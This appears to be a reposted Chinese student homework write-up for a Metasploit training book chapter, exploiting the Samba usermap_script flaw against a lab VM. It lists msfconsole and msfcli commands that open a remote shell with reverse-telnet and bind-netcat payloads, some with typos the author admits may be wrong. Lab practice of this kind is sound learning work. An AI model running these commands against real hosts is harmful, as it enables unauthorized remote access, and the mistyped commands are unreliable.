metasploit魔鬼训练营第一章实践作业
来源:互联网 发布:擎天软件科技有限公司 编辑:程序博客网 时间:2024/05/11 05:53
1.搜索Samba服务usermap_script安全漏洞相关信息
根据下面的连接,搜索到如下内容:
The time line is as follows:* May 7, 2007: Initial defect disclosure to the security@samba.org email alias.* May 7, 2007: Initial developer response by Samba developer Gerald Carter.* May 9, 2007: Patch released by Samba developer Jeremy Allison to iDefense for testing.* May 10, Announcement to vendor-sec mailing list* May 14, 2007: Public announcement of the security issue.
2.msfconsole 更新apt-get update
metasploit攻击模块路径:
dpkg -S metasploit
kali:/usr/share/metasploit-framework/modules/exploits
BT5:/opt/framework3/msf3/modules/exploits
linuxshell 统计针对windows2000 windowsxp。。。。目标环境的攻击模块数量(不知道)
3.运行metasploit完成对Linux靶机usermap_script攻击
kali: msfconsole
msf>show exploits
msf>use exploit/multi/samba/usermap_script
msf> use exploit/multi/samba/usermap_scriptmsf> show optionsmsf> set RHOST 192.168.213.133msf> exploit尝试使用VNC图形化远程控制工具的攻击载荷
我的做法:
msf exploit(usermap_script) > show payloads
msf exploit(usermap_script) > set PAYLOADS cmd/unix/reverse_ssl_double_telnet
msf exploit(usermap_script) > exploits
攻击失败了,但是流程应该是这样的????求解答
4.msfcli -h
msfconsole
msf>show payloads
msf>vim 1.attack.sh
msfcli multi/samba/usermap_script PAYLOAD=/cmd/unix/bind_netcat RHOST=$1 E
msf>sh 1.attack.sh 192.168.213.133
0 1
- metasploit魔鬼训练营第一章实践作业
- metasploit魔鬼训练营第一章笔记
- metsploit魔鬼训练营第一章作业
- 《Metasploit 魔鬼训练营》01 初识 Metasploit
- Metasploit渗透测试魔鬼训练营
- 《Metasploit 魔鬼训练营》博客目录
- 《Metasploit 魔鬼训练营》07 社会工程学
- metasploit魔鬼训练营第一天笔记
- metasploit魔鬼训练营第二天笔记
- metasploit魔鬼训练营第三天笔记
- 【Metasploit魔鬼训练营--实践笔记】4.2.3 SQL 注入漏洞探测
- 【Metasploit魔鬼训练营-自我实践记录】第3.3.2 口令猜测与嗅探--虚拟机实践
- 《Metasploit渗透测试魔鬼训练营》 之 信息收集工具
- 《Metasploit渗透测试魔鬼训练营》 之 工具整理
- 《Metasploit渗透测试魔鬼训练营》 之 SQL注入
- 《Metasploit渗透测试魔鬼训练营》 之 XSS
- 《Metasploit渗透测试魔鬼训练营》 之 命令注入
- 《Metasploit渗透测试魔鬼训练营》 之 文件包含
- LaTeX实战经验:如何插入程序代码
- git-如何在git上下载单个文件夹
- linux下安装或升级GCC 4.8以上版本(包括),以支持C++11
- matlab函数笔记
- [LeetCode
- metasploit魔鬼训练营第一章实践作业
- Error:Execution failed for task ':app:mergeDebugResources'. > Error: java.ut
- oracle 的sys 和 system 账号
- 栈的压入、弹出序列
- Member Function的调用方式
- BZOJ4864 [BeiJing 2017 Wc]神秘物质
- JavaWeb--Servlet过滤器Filter和SpringMVC的HandlerInterceptor(Session和Cookie登录认证)
- SuperMap Objects .NET 中更新方法的使用
- C++的扩充